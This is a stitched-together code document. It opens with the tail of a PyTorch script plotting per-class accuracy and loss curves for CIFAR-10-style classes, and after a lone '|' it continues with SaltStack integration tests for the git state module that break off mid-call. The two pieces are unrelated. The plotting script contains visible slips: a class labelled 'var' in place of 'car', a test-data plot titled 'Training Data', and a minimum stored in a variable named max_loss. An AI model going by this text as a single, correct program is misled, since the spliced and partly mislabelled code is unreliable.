ax.plot(x,trans_list[6],'#1f77b4',label='frog')
ax.plot(x,trans_list[7],'#9467bd',label='horse')
ax.plot(x,trans_list[8],'#e377c2',label='ship')
ax.plot(x,trans_list[9],'#7f7f7f',label='truck')
legend = ax.legend(loc='upper left', shadow=False, fontsize='small')
ax.set(xlabel='Epoch', ylabel='Class Accuracy (%)',
title='Class Accuracies during Learning for Training Data')
fig.savefig(PLOT_PATH+"Learning Class Accuracy Curves for Training Data: " +PATH+'.png',dpi=200)
# In[ ]:
# Plot class accuracy learning curves
x = np.arange(1,MaxEpoch+1,1)
fig, ax =plt.subplots()
trans_list=np.transpose(test_class_acc_list)
ax.plot(x,trans_list[0],'#8c564b',label='plane')
ax.plot(x,trans_list[1],'#d62728',label='var')
ax.plot(x,trans_list[2],'#ff7f0e',label='bird')
ax.plot(x,trans_list[3],'#bcbd22',label='cat')
ax.plot(x,trans_list[4],'#2ca02c',label='deer')
ax.plot(x,trans_list[5],'#17becf',label='dog')
ax.plot(x,trans_list[6],'#1f77b4',label='frog')
ax.plot(x,trans_list[7],'#9467bd',label='horse')
ax.plot(x,trans_list[8],'#e377c2',label='ship')
ax.plot(x,trans_list[9],'#7f7f7f',label='truck')
legend = ax.legend(loc='upper left', shadow=False, fontsize='small')
ax.set(xlabel='Epoch', ylabel='Class Accuracy (%)',
title='Class Accuracies during Learning for Training Data')
fig.savefig(PLOT_PATH+"Learning Class Accuracy Curves for Test Data: " +PATH+'.png',dpi=200)
# In[ ]:
# Plot class loss learning curves
x = np.arange(1,MaxEpoch+1,1)
fig, ax =plt.subplots()
trans_list=np.transpose(train_class_loss_list)
ax.plot(x,trans_list[0],'#8c564b',label='plane')
ax.plot(x,trans_list[1],'#d62728',label='var')
ax.plot(x,trans_list[2],'#ff7f0e',label='bird')
ax.plot(x,trans_list[3],'#bcbd22',label='cat')
ax.plot(x,trans_list[4],'#2ca02c',label='deer')
ax.plot(x,trans_list[5],'#17becf',label='dog')
ax.plot(x,trans_list[6],'#1f77b4',label='frog')
ax.plot(x,trans_list[7],'#9467bd',label='horse')
ax.plot(x,trans_list[8],'#e377c2',label='ship')
ax.plot(x,trans_list[9],'#7f7f7f',label='truck')
legend = ax.legend(loc='upper left', shadow=False, fontsize='small')
ax.set(xlabel='Epoch', ylabel='Class Loss',
title='Class Loss during Learning for Training Data')
fig.savefig(PLOT_PATH+"Class Loss Curves for Training Data: " +PATH+'.png',dpi=200)
# In[ ]:
# Plot class loss learning curves
x = np.arange(1,MaxEpoch+1,1)
fig, ax =plt.subplots()
trans_list=np.transpose(test_class_loss_list)
ax.plot(x,trans_list[0],'#8c564b',label='plane')
ax.plot(x,trans_list[1],'#d62728',label='var')
ax.plot(x,trans_list[2],'#ff7f0e',label='bird')
ax.plot(x,trans_list[3],'#bcbd22',label='cat')
ax.plot(x,trans_list[4],'#2ca02c',label='deer')
ax.plot(x,trans_list[5],'#17becf',label='dog')
ax.plot(x,trans_list[6],'#1f77b4',label='frog')
ax.plot(x,trans_list[7],'#9467bd',label='horse')
ax.plot(x,trans_list[8],'#e377c2',label='ship')
ax.plot(x,trans_list[9],'#7f7f7f',label='truck')
legend = ax.legend(loc='upper left', shadow=False, fontsize='small')
ax.set(xlabel='Epoch', ylabel='Class Loss',
title='Class Loss during Learning for Test Data')
fig.savefig(PLOT_PATH+"Class Loss Curves for Test Data: " +PATH+'.png',dpi=200)
# save entire model
torch.save(net,PATH_A)
# load entire model
#APath='dr00h20'
model=torch.load(PATH_A)
model.eval()
max_loss=min(test_loss_list)
max_ind=test_loss_list.index(max_loss)
print('Min Test Loss: Train/Test Ave/STD Acc: ', train_ave_class_acc_list[max_ind],
test_ave_class_acc_list[max_ind], train_std_class_acc_list[max_ind],test_std_class_acc_list[max_ind])
max_loss=max(test_ave_class_acc_list)
max_ind=test_ave_class_acc_list.index(max_loss)
print('Max Test Ave: Train/Test Ave/STD Acc: ', train_ave_class_acc_list[max_ind],
test_ave_class_acc_list[max_ind], train_std_class_acc_list[max_ind],test_std_class_acc_list[max_ind])
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
# CUDA 기기가 존재한다면, 아래 코드가 CUDA 장치를 출력합니다:
print(device)
del dataiter
|
# -*- coding: utf-8 -*-
'''
Tests for the Git state
'''
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import functools
import inspect
import os
import shutil
import socket
import string
import tempfile
# Import Salt Testing libs
from tests.support.case import ModuleCase
from tests.support.helpers import with_tempdir
from tests.support.mixins import SaltReturnAssertsMixin
from tests.support.paths import TMP
# Import salt libs
import salt.utils.files
import salt.utils.path
from salt.utils.versions import LooseVersion as _LooseVersion
from salt.ext.six.moves.urllib.parse import urlparse # pylint: disable=no-name-in-module
TEST_REPO = 'https://github.com/saltstack/salt-test-repo.git'
def __check_git_version(caller, min_version, skip_msg):
'''
Common logic for version check
'''
if inspect.isclass(caller):
actual_setup = getattr(caller, 'setUp', None)
def setUp(self, *args, **kwargs):
if not salt.utils.path.which('git'):
self.skipTest('git is not installed')
git_version = self.run_function('git.version')
if _LooseVersion(git_version) < _LooseVersion(min_version):
self.skipTest(skip_msg.format(min_version, git_version))
if actual_setup is not None:
actual_setup(self, *args, **kwargs)
caller.setUp = setUp
return caller
@functools.wraps(caller)
def wrapper(self, *args, **kwargs):
if not salt.utils.path.which('git'):
self.skipTest('git is not installed')
git_version = self.run_function('git.version')
if _LooseVersion(git_version) < _LooseVersion(min_version):
self.skipTest(skip_msg.format(min_version, git_version))
return caller(self, *args, **kwargs)
return wrapper
def ensure_min_git(caller=None, min_version='1.6.5'):
'''
Skip test if minimum supported git version is not installed
'''
if caller is None:
return functools.partial(ensure_min_git, min_version=min_version)
return __check_git_version(
caller,
min_version,
'git {0} or newer required to run this test (detected {1})'
)
def uses_git_opts(caller):
'''
Skip test if git_opts is not supported
IMPORTANT! This decorator should be at the bottom of any decorators added
to a given function.
'''
min_version = '1.7.2'
return __check_git_version(
caller,
min_version,
'git_opts only supported in git {0} and newer (detected {1})'
)
class WithGitMirror(object):
def __init__(self, repo_url, **kwargs):
self.repo_url = repo_url
if 'dir' not in kwargs:
kwargs['dir'] = TMP
self.kwargs = kwargs
def __call__(self, func):
self.func = func
return functools.wraps(func)(
lambda testcase, *args, **kwargs: self.wrap(testcase, *args, **kwargs) # pylint: disable=W0108
)
def wrap(self, testcase, *args, **kwargs):
# Get temp dir paths
mirror_dir = tempfile.mkdtemp(**self.kwargs)
admin_dir = tempfile.mkdtemp(**self.kwargs)
clone_dir = tempfile.mkdtemp(**self.kwargs)
# Clean up the directories, we want git to actually create them
os.rmdir(mirror_dir)
os.rmdir(admin_dir)
os.rmdir(clone_dir)
# Create a URL to clone
mirror_url = 'file://' + mirror_dir
# Mirror the repo
testcase.run_function(
'git.clone', [mirror_dir], url=TEST_REPO, opts='--mirror')
# Make sure the directory for the mirror now exists
assert os.path.exists(mirror_dir)
# Clone to the admin dir
ret = testcase.run_state('git.latest', name=mirror_url, target=admin_dir)
ret = ret[next(iter(ret))]
assert os.path.exists(admin_dir)
try:
# Run the actual function with three arguments added:
# 1. URL for the test to use to clone
# 2. Cloned admin dir for making/pushing changes to the mirror
# 3. Yet-nonexistant clone_dir for the test function to use as a
# destination for cloning.
return self.func(testcase, mirror_url, admin_dir, clone_dir, *args, **kwargs)
finally:
shutil.rmtree(mirror_dir, ignore_errors=True)
shutil.rmtree(admin_dir, ignore_errors=True)
shutil.rmtree(clone_dir, ignore_errors=True)
with_git_mirror = WithGitMirror
@ensure_min_git
class GitTest(ModuleCase, SaltReturnAssertsMixin):
'''
Validate the git state
'''
def setUp(self):
domain = urlparse(TEST_REPO).netloc
try:
if hasattr(socket, 'setdefaulttimeout'):
# 10 second dns timeout
socket.setdefaulttimeout(10)
socket.gethostbyname(domain)
except socket.error:
msg = 'error resolving {0}, possible network issue?'
self.skipTest(msg.format(domain))
def tearDown(self):
# Reset the dns timeout after the test is over
socket.setdefaulttimeout(None)
def _head(self, cwd):
return self.run_function('git.rev_parse', [cwd, 'HEAD'])
@with_tempdir(create=False)
def test_latest(self, target):
'''
git.latest
'''
ret = self.run_state(
'git.latest',
name=TEST_REPO,
target=target
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isdir(os.path.join(target, '.git')))
@with_tempdir(create=False)
def test_latest_with_rev_and_submodules(self, target):
'''
git.latest
'''
ret = self.run_state(
'git.latest',
name=TEST_REPO,
rev='develop',
target=target,
submodules=True
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isdir(os.path.join(target, '.git')))
@with_tempdir(create=False)
def test_latest_failure(self, target):
'''
git.latest
'''
ret = self.run_state(
'git.latest',
name='https://youSpelledGitHubWrong.com/saltstack/salt-test-repo.git',
rev='develop',
target=target,
submodules=True
)
self.assertSaltFalseReturn(ret)
self.assertFalse(os.path.isdir(os.path.join(target, '.git')))
@with_tempdir()
def test_latest_empty_dir(self, target):
'''
git.latest
'''
ret = self.run_state(
'git.latest',
name=TEST_REPO,
rev='develop',
target=target,
submodules=True
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isdir(os.path.join(target, '.git')))
@with_tempdir(create=False)
def test_latest_unless_no_cwd_issue_6800(self, target):
'''
cwd=target was being passed to _run_check which blew up if
target dir did not already exist.
'''
ret = self.run_state(
'git.latest',
name=TEST_REPO,
rev='develop',
target=target,
unless='test -e {0}'.format(target),
submodules=True
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isdir(os.path.join(target, '.git')))
@with_tempdir(create=False)
def test_numeric_rev(self, target):
'''
git.latest with numeric revision
'''
ret = self.run_state(
'git.latest',
name=TEST_REPO,
rev=0.11,
target=target,
submodules=True,
timeout=120
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isdir(os.path.join(target, '.git')))
@with_tempdir(create=False)
def test_latest_with_local_changes(self, target):
'''
Ensure that we fail the state when there are local changes and succeed
when force_reset is True.
'''
# Clone repo
ret = self.run_state(
'git.latest',
name=TEST_REPO,
target=target
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isdir(os.path.join(target, '.git')))
# Make change to LICENSE file.
with salt.utils.files.fopen(os.path.join(target, 'LICENSE'), 'a') as fp_:
fp_.write('Lorem ipsum dolor blah blah blah....\n')
# Make sure that we now have uncommitted changes
self.assertTrue(self.run_function('git.diff', [target, 'HEAD']))
# Re-run state with force_reset=False
ret = self.run_state(
'git.latest',
name=TEST_REPO,
target=target,
force_reset=False
)
self.assertSaltTrueReturn(ret)
self.assertEqual(
ret[next(iter(ret))]['comment'],
('Repository {0} is up-to-date, but with uncommitted changes. '
'Set \'force_reset\' to True to purge uncommitted changes.'
.format(target))
)
# Now run the state with force_reset=True
ret = self.run_state(
'git.latest',
name=TEST_REPO,
target=target,
force_reset=True
)
self.assertSaltTrueReturn(ret)
# Make sure that we no longer have uncommitted changes
self.assertFalse(self.run_function('git.diff', [target, 'HEAD']))
@with_git_mirror(TEST_REPO)
@uses_git_opts
def test_latest_fast_forward(self, mirror_url, admin_dir, clone_dir):
'''
Test running git.latest state a second time after changes have been
made to the remote repo.
'''
# Clone the repo
ret = self.run_state('git.latest', name=mirror_url, target=clone_dir)
ret = ret[next(iter(ret))]
assert ret['result']
# Make a change to the repo by editing the file in the admin copy
# of the repo and committing.
head_pre = self._head(admin_dir)
with salt.utils.files.fopen(os.path.join(admin_dir, 'LICENSE'), 'a') as fp_:
fp_.write('Hello world!')
self.run_function(
'git.commit', [admin_dir, 'added a line'],
git_opts='-c user.name="Foo Bar" -c user.email=foo@bar.com',
opts='-a',
)
# Make sure HEAD is pointing to a new SHA so we know we properly
# committed our change.
head_post = self._head(admin_dir)
assert head_pre != head_post
# Push the change to the mirror
# NOTE: the test will fail if the salt-test-repo's default branch
# is changed.
self.run_function('git.push', [admin_dir, 'origin', 'develop'])
# Re-run the git.latest state on the clone_dir
ret = self.run_state('git.latest', name=mirror_url, target=clone_dir)
ret = ret[next(iter(ret))]
assert ret['result']
# Make sure that the clone_dir now has the correct SHA
assert head_post == self._head(clone_dir)
@with_tempdir(create=False)
def _changed_local_branch_helper(self, target, rev, hint):
'''
We're testing two almost identical cases, the only thing that differs
is the rev used for the git.latest state.
'''
# Clone repo
ret = self.run_state(
'git.latest',
name=TEST_REPO,
rev=rev,
target=target
)
self.assertSaltTrueReturn(ret)
# Check out a new branch in the clone and make a commit, to ensure
# that when we re-run the state, it is not a fast-forward change
self.run_function('git.checkout', [target, 'new_branch'], opts='-b')
with salt.utils.files.fopen(os.path.join(target, 'foo'), 'w'):
pass
self.run_function('git.add', [target, '.'])
self.run_function(
'git.commit', [target, 'add file'],
git_opts='-c user.name="Foo Bar" -c user.email=foo@bar.com',
)
# Re-run the state, this should fail with a specific hint in the
# comment field.
ret = self.run_state(
'git.latest',
name=TEST_REPO,
rev=rev,
target=target
)
self.assertSaltFalseReturn(ret)
comment = ret[next(iter(ret))]['comment']
self.assertTrue(hint in comment)
@uses_git_opts
def test_latest_changed_local_branch_rev_head(self):
'''
Test for presence of hint in failure message when the local branch has
been changed and a the rev is set to HEAD
This test will fail if the default branch for the salt-test-repo is
ever changed.
'''
self._changed_local_branch_helper( # pylint: disable=no-value-for-parameter
'HEAD',
'The default remote branch (develop) differs from the local '
'branch (new_branch)'
)
@uses_git_opts
def test_latest_changed_local_branch_rev_develop(self):
'''
Test for presence of hint in failure message when the local branch has
been changed and a non-HEAD rev is specified
'''
self._changed_local_branch_helper( # pylint: disable=no-value-for-parameter
'develop',
'The desired rev (develop) differs from the name of the local '
'branch (new_branch)'
)
@uses_git_opts
@with_tempdir(create=False)
@with_tempdir()
def test_latest_updated_remote_rev(self, name, target):
'''
Ensure that we don't exit early when checking for a fast-forward
'''
# Initialize a new git repository
self.run_function('git.init', [name])
# Add and commit a file
with salt.utils.files.fopen(os.path.join(name, 'foo.txt'), 'w') as fp_:
fp_.write('Hello world\n')
self.run_function('git.add', [name, '.'])
self.run_function(
'git.commit', [name, 'initial commit'],
git_opts='-c user.name="Foo Bar" -c user.email=foo@bar.com',
)
# Run the state to clone the repo we just created
ret = self.run_state(
'git.latest',
name=name,
target=target,
)
self.assertSaltTrueReturn(ret)
# Add another commit
with salt.utils.files.fopen(os.path.join(name, 'foo.txt'), 'w') as fp_:
fp_.write('Added a line\n')
self.run_function(
'git.commit', [name, 'added a line'],
git_opts='-c user.name="Foo Bar" -c user.email=foo@bar.com',
opts='-a',
)
# Run the state again. It should pass, if it doesn't then there was
# a problem checking whether or not the change is a fast-forward.
ret = self.run_state(
'git.latest',
name=name,
target=target,
)
self.assertSaltTrueReturn(ret)
@with_tempdir(create=False)
def test_latest_depth(self, target):
'''
Test running git.latest state using the "depth" argument to limit the
history. See #45394.
'''
ret = self.run_state(
'git.latest',
name=TEST_REPO,
rev='HEAD',
target=target,
depth=1
)
# HEAD is not a branch, this should fail
self.assertSaltFalseReturn(ret)
self.assertIn(
'must be set to the name of a branch',
ret[next(iter(ret))]['comment']
)
ret = self.run_state(
'git.latest',
name=TEST_REPO,
rev='non-default-branch',
target=target,
depth=1
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isdir(os.path.join(target, '.git')))
@with_git_mirror(TEST_REPO)
@uses_git_opts
def test_latest_sync_tags(self, mirror_url, admin_dir, clone_dir):
'''
Test that a removed tag is properly reported as such and removed in the
local clone, and that new tags are reported as new.
'''
tag1 = 'mytag1'
tag2 = 'mytag2'
# Add and push a tag
self.run_function('git.tag', [admin_dir, tag1])
self.run_function('git.push', [admin_dir, 'origin', tag1])
# Clone the repo
ret = self.run_state('git.latest', name=mirror_url, target=clone_dir)
ret = ret[next(iter(ret))]
assert ret['result']
# Now remove the tag
self.run_function('git.push', [admin_dir, 'origin', ':{0}'.format(tag1)])
# Add and push another tag
self.run_function('git.tag', [admin_dir, tag2])
self.run_function('git.push', [admin_dir, 'origin', tag2])
# Re-run the state with sync_tags=False. This should NOT delete the tag
# from the local clone, but should report that a tag has been added.
ret = self.run_state('git.latest',
name=mirror_url,
target=clone_dir,
sync_tags=False)
ret = ret[next(iter(ret))]
assert ret['result']
# Make ABSOLUTELY SURE both tags are present, since we shouldn't have
# removed tag1.
all_tags = self.run_function('git.list_tags', [clone_dir])
assert tag1 in all_tags
assert tag2 in all_tags
# Make sure the reported changes are correct
expected_changes = {'new_tags': [tag2]}
assert ret['changes'] == expected_changes, ret['changes']
# Re-run the state with sync_tags=True. This should remove the local
# tag, since it doesn't exist in the remote repository.
ret = self.run_state('git.latest',
name=mirror_url,
target=clone_dir,
sync_tags=True)
ret = ret[next(iter(ret))]
assert ret['result']
# Make ABSOLUTELY SURE the expected tags are present/gone
all_tags = self.run_function('git.list_tags', [clone_dir])
assert tag1 not in all_tags
assert tag2 in all_tags
# Make sure the reported changes are correct
expected_changes = {'deleted_tags': [tag1]}
assert ret['changes'] == expected_changes, ret['changes']
@with_tempdir(create=False)
def test_cloned(self, target):
'''
Test git.cloned state
'''
# Test mode
ret = self.run_state(
'git.cloned',
name=TEST_REPO,
target=target,
test=True)
ret = ret[next(iter(ret))]
assert ret['result'] is None
assert ret['changes'] == {
'new': '{0} => {1}'.format(TEST_REPO, target)
}
assert ret['comment'] == '{0} would be cloned to {1}'.format(
TEST_REPO,
target
)
# Now actually run the state
ret = self.run_state(
'git.cloned',
name=TEST_REPO,
target=target)
ret = ret[next(iter(ret))]
assert ret['result'] is True
assert ret['changes'] == {
'new': '{0} => {1}'.format(TEST_REPO, target)
}
assert ret['comment'] == '{0} cloned to {1}'.format(TEST_REPO, target)
# Run the state again to test idempotence
ret = self.run_state(
'git.cloned',
name=TEST_REPO,
target=target)
ret = ret[next(iter(ret))]
assert ret['result'] is True
assert not ret['changes']
assert ret['comment'] == 'Repository already exists at {0}'.format(target)
# Run the state again to test idempotence (test mode)
ret = self.run_state(
'git.cloned',
name=TEST_REPO,
target=target,
test=True)
ret = ret[next(iter(ret))]
assert not ret['changes']
assert ret['result'] is True
assert ret['comment'] == 'Repository already exists at {0}'.format(target)
@with_tempdir(create=False)
def test_cloned_with_branch(self, target):
'''
Test git.cloned state with branch provided
'''
old_branch = 'master'
new_branch = 'develop'
bad_branch = 'thisbranchdoesnotexist'
# Test mode
ret = self.run_state(
'git.cloned',
name=TEST_REPO,
target=target,
branch=old_branch,
test=True)
ret = ret[next(iter(ret))]
assert ret['result'] is None
assert ret['changes'] == {
'new': '{0} => {1}'.format(TEST_REPO, target)
}
assert ret['comment'] == (
'{0} would be cloned to {1} with branch \'{2}\''.format(
TEST_REPO,
target,
old_branch
)
)
# Now actually run the state
ret = self.run_state(
'git.cloned',
name=TEST_REPO,
target=target,
branch=old_branch)
ret = ret[next(iter(ret))]
assert ret['result'] is True
assert ret['changes'] == {
'new': '{0} => {1}'.format(TEST_REPO, target)
}
assert ret['comment'] == (
'{0} cloned to {1} with branch \'{2}\''.format(
TEST_REPO,
target,
old_branch
)
)
# Run the state again to test idempotence
ret = self.run_state(
'git.cloned',
name=TEST_REPO,
target=target,
branch=old_branch)
ret = ret[next(iter(ret))]
assert ret['result'] is True
assert not ret['changes']
assert ret['comment'] == (
'Repository already exists at {0} '
'and is checked out to branch \'{1}\''.format(target, old_branch)
)
# Run the state again to test idempotence (test mode)
ret = self.run_state(
'git.cloned',
name=TEST_REPO,
target=target,
test=True,
branch=old_branch)
ret = ret[next(iter(ret))]
assert ret['result'] is True
assert not ret['changes']
assert ret['comment'] == (
'Repository already exists at {0} '
'and is checked out to branch \'{1}\''.format(target, old_branch)
)
# Change branch (test mode)
ret = self.run_state(
'git.cloned',
name=TEST_REPO,
target=target,
branch=new_branch,
test=True)
ret = ret[next(iter(ret))]
assert ret['result'] is None
assert ret['changes'] == {
'branch': {'old': old_branch, 'new': new_branch}
}
assert ret['comment'] == 'Branch would be changed to \'{0}\''.format(
new_branch
)
# Now really change the branch
ret = self.run_state(
'git.cloned',
name=TEST_REPO,
target=target,
branch=new_branch)
ret = ret[next(iter(ret))]
assert ret['result'] is True
assert ret['changes'] == {
'branch': {'old': old_branch, 'new': new_branch}
}
assert ret['comment'] == 'Branch changed to \'{0}\''.format(
new_branch
)
# Change back to original branch. This tests that we don't attempt to
# checkout a new branch (i.e. git checkout -b) for a branch that exists
# locally, as that would fail.
ret = self.run_state(
'git.cloned',
name=TEST_REPO,
target=target,
branch=old_branch)
ret = ret[next(iter(ret))]
assert ret['result'] is True
assert ret['changes'] == {
'branch': {'old': new_branch, 'new': old_branch}
}
assert ret['comment'] == 'Branch changed to \'{0}\''.format(
old_branch
)
# Test switching to a nonexistant branch. This should fail.
ret = self.run_state(
'git.cloned',
name=TEST_REPO,
target=target,
branch=bad_branch)
ret = ret[next(iter(ret))]
assert ret['result'] is False
assert not ret['changes']
assert ret['comment'].startswith(
'Failed to change branch to \'{0}\':'.format(bad_branch)
)
@with_tempdir(create=False)
@ensure_min_git(min_version='1.7.10')
def test_cloned_with_nonexistant_branch(self, target):
'''
Test git.cloned state with a nonexistant branch provided
'''
branch = 'thisbranchdoesnotexist'
# Test mode
ret = self.run_state(
'git.cloned',
name=TEST_REPO,
target=target,
branch=branch,
test=True)
ret = ret[next(iter(ret))]
assert ret['result'] is None
assert ret['changes']
assert ret['comment'] == (
'{0} would be cloned to {1} with branch \'{2}\''.format(
TEST_REPO,
target,
branch
)
)
# Now actually run the state
ret = self.run_state(
'git.cloned',
name=TEST_REPO,
target=target,
branch=branch)
ret = ret[next(iter(ret))]
assert ret['result'] is False
assert not ret['changes']
assert ret['comment'].startswith('Clone failed:')
assert 'not found in upstream origin' in ret['comment']
@with_tempdir(create=False)
def test_present(self, name):
'''
git.present
'''
ret = self.run_state(
'git.present',
name=name,
bare=True
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(os.path.join(name, 'HEAD')))
@with_tempdir()
def test_present_failure(self, name):
'''
git.present
'''
fname = os.path.join(name, 'stoptheprocess')
with salt.utils.files.fopen(fname, 'a'):
pass
ret = self.run_state(
'git.present',
name=name,
bare=True
)
self.assertSaltFalseReturn(ret)
self.assertFalse(os.path.isfile(os.path.join(name, 'HEAD')))
@with_tempdir()
def test_present_empty_dir(self, name):
'''
git.present
'''
ret = self.run_state(
'git.present',
name=name,
bare=True
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(os.path.join(name, 'HEAD')))
@with_tempdir()
def test_config_set_value_with_space_character(self, name):
'''
git.config
'''
self.run_function('git.init', [name])
ret = self.run_state(
'git.config_set',
name='user.name',
value='foo bar',
repo=name,
**{'global': False})
self.assertSaltTrueReturn(ret)
@ensure_min_git
@uses_git_opts
class LocalRepoGitTest(ModuleCase, SaltReturnAssertsMixin):
'''
Tests which do no require connectivity to github.com
'''
def setUp(self):
self.repo = tempfile.mkdtemp(dir=TMP)
self.admin = tempfile.mkdtemp(dir=TMP)
self.target = tempfile.mkdtemp(dir=TMP)
for dirname in (self.repo, self.admin, self.target):
self.addCleanup(shutil.rmtree, dirname, ignore_errors=True)
# Create bare repo
self.run_function('git.init', [self.repo], bare=True)
# Clone bare repo
self.run_function('git.clone', [self.admin], url=self.repo)
self._commit(self.admin, '', message='initial commit')
self._push(self.admin)
def _commit(self, repo_path, content, message):
with salt.utils.files.fopen(os.path.join(repo_path, 'foo'), 'a') as fp_:
fp_.write(content)
self.run_function('git.add', [repo_path, '.'])
self.run_function(
'git.commit', [repo_path, message],
git_opts='-c user.name="Foo Bar" -c user.email=foo@bar.com',
)
def _push(self, repo_path, remote='origin', ref='master'):
self.run_function('git.push', [repo_path], remote=remote, ref=ref)
def _test_latest_force_reset_setup(self):
# Perform the initial clone
ret = self.run_state(
'git.latest',
name=self.repo,
target=self.target)
self.assertSaltTrueReturn(ret)
# Make and push changes to remote repo
self._commit(self.admin,
content='Hello world!\n',
message='added a line')
self._push(self.admin)
# Make local changes to clone, but don't commit them
with salt.utils.files.fopen(os.path.join(self.target, 'foo'), 'a') as fp_:
fp_.write('Local changes!\n')
def test_latest_force_reset_remote_changes(self):
'''
This tests that an otherwise fast-forward change with local chanegs
will not reset local changes when force_reset='remote_changes'
'''
self._test_latest_force_reset_setup()
# This should fail because of the local changes
ret = self.run_state(
'git.latest',
name=self.repo,
target=self.target)
self.assertSaltFalseReturn(ret)
ret = ret[next(iter(ret))]
self.assertIn('there are uncommitted changes', ret['comment'])
self.assertIn(
'Set \'force_reset\' to True (or \'remote-changes\')',
ret['comment']
)
self.assertEqual(ret['changes'], {})
# Now run again with force_reset='remote_changes', the state should
# succeed and discard the local changes
ret = self.run_state(
'git.latest',
name=self.repo,
target=self.target,
force_reset='remote-changes')
self.assertSaltTrueReturn(ret)
ret = ret[next(iter(ret))]
self.assertIn('Uncommitted changes were discarded', ret['comment'])
self.assertIn('Repository was fast-forwarded', ret['comment'])
self.assertNotIn('forced update', ret['changes'])
self.assertIn('revision', ret['changes'])
# Add new local changes, but don't commit them
with salt.utils.files.fopen(os.path.join(self.target, 'foo'), 'a') as fp_:
fp_.write('More local changes!\n')
# Now run again with force_reset='remote_changes', the state should
# succeed with an up-to-date message and mention that there are local
# changes, telling the user how to discard them.
ret = self.run_state(
'git.latest',
name=self.repo,
target=self.target,
force_reset='remote-changes')
self.assertSaltTrueReturn(ret)
ret = ret[next(iter(ret))]
self.assertIn('up-to-date, but with uncommitted changes', ret['comment'])
self.assertIn(
'Set \'force_reset\' to True to purge uncommitted changes',
ret['comment']
)
self.assertEqual(ret['changes'], {})
def test_latest_force_reset_true_fast_forward(self):
'''
This tests that an otherwise fast-forward change with local chanegs
does reset local changes when force_reset=True
'''
self._test_latest_force_reset_setup()
# Test that local changes are discarded and that we fast-forward
ret = self.run_state(
'git.latest',
name=self.repo,
target=self.target,
force_reset=True)
self.assertSaltTrueReturn(ret)
ret = ret[next(iter(ret))]
self.assertIn('Uncommitted changes were discarded', ret['comment'])
self.assertIn('Repository was fast-forwarded', ret['comment'])
# Add new local changes
with salt.utils.files.fopen(os.path.join(self.target, 'foo'), 'a') as fp_:
fp_.write('More local changes!\n')
# Running without setting force_reset should mention uncommitted changes
ret = self.run_state(
'git.latest',
name=self.repo,
target=self.target)
self.assertSaltTrueReturn(ret)
ret = ret[next(iter(ret))]
self.assertIn('up-to-date, but with uncommitted changes', ret['comment'])
self.assertIn(
'Set \'force_reset\' to True to purge uncommitted changes',
ret['comment']
)
self.assertEqual(ret['changes'], {})
# Test that local changes are discarded
ret = self.run_state(
'git.latest',
name=TEST_REPO,
target=self.target,
force_reset=True)
self.assertSaltTrueReturn(ret)
ret = ret[next(iter(ret))]
assert 'Uncommitted changes were discarded' in ret['comment']
assert 'Repository was hard-reset' in ret['comment']
assert 'forced update' in ret['changes']
def test_latest_force_reset_true_non_fast_forward(self):
'''
This tests that a non fast-forward change with divergent commits fails
unless force_reset=True.
'''
self._test_latest_force_reset_setup()
# Reset to remote HEAD
ret = self.run_state(
'git.latest',
name=self.repo,
target=self.target,
force_reset=True)
self.assertSaltTrueReturn(ret)
ret = ret[next(iter(ret))]
self.assertIn('Uncommitted changes were discarded', ret['comment'])
self.assertIn('Repository was fast-forwarded', ret['comment'])
# Make and push changes to remote repo
self._commit(self.admin,
content='New line\n',
message='added another line')
self._push(self.admin)
# Make different changes to local file and commit locally
self._commit(self.target,
content='Different new line\n',
message='added a different line')
# This should fail since the local clone has diverged and cannot
# fast-forward to the remote rev
ret = self.run_state(
'git.latest',
name=self.repo,
target=self.target)
self.assertSaltFalseReturn(ret)
ret = ret[next(iter(ret))]
self.assertIn('this is not a fast-forward merge', ret['comment'])
self.assertIn(
'Set \'force_reset\' to True to force this update',
ret['comment']
)
self.assertEqual(ret['changes'], {})
# Repeat the state with force_reset=True and confirm that the hard
# reset was performed
ret = self.run_state(
'git.latest',
name=self.repo,
target=self.target,
force_reset=True)
self.assertSaltTrueReturn(ret)
ret = ret[next(iter(ret))]
self.assertIn('Repository was hard-reset', ret['comment'])
self.assertIn('forced update', ret['changes'])
self.assertIn('revision', ret['changes'])
def test_renamed_default_branch(self):
'''
Test the case where the remote branch has been removed
https://github.com/saltstack/salt/issues/36242
'''
# Rename remote 'master' branch to 'develop'
os.rename(
os.path.join(self.repo, 'refs', 'heads', 'master'),
os.path.join(self.repo, 'refs', 'heads', 'develop')
)
# Run git.latest state. This should successfully clone and fail with a
# specific error in the comment field.
ret = self.run_state(
'git.latest',
name=self.repo,
target=self.target,
rev='develop',
)
self.assertSaltFalseReturn(ret)
self.assertEqual(
ret[next(iter(ret))]['comment'],
'Remote HEAD refers to a ref that does not exist. '
'This can happen when the default branch on the '
'remote repository is renamed or deleted. If you '
'are unable to fix the remote repository, you can '
'work around this by setting the \'branch\' argument '
'(which will ensure that the named branch is created '
'if it does not already exist).\n\n'
'Changes already made: {0} cloned to {1}'
.format(self.repo, self.target)
)
self.assertEqual(
ret[next(iter(ret))]['changes'],
{'new': '{0} => {1}'.format(self.repo, self.target)}
)
# Run git.latest state again. This should fail again, with a different
# error in the comment field, and should not change anything.
ret = self.run_state(
'git.latest',
name=self.repo,
target=self.target,
rev='develop',
)
self.assertSaltFalseReturn(ret)
self.assertEqual(
ret[next(iter(ret))]['comment'],
'Cannot set/unset upstream tracking branch, local '
'HEAD refers to nonexistent branch. This may have '
'been caused by cloning a remote repository for which '
'the default branch was renamed or deleted. If you '
'are unable to fix the remote repository, you can '
'work around this by setting the \'branch\' argument '
'(which will ensure that the named branch is created '
'if it does not already exist).'
)
self.assertEqual(ret[next(iter(ret))]['changes'], {})
# Run git.latest state again with a branch manually set. This should
# checkout a new branch and the state should pass.
ret = self.run_state(
'git.latest',
name=self.repo,
target=self.target,
rev='develop',
branch='develop',
)
# State should succeed
self.assertSaltTrueReturn(ret)
self.assertSaltCommentRegexpMatches(
ret,
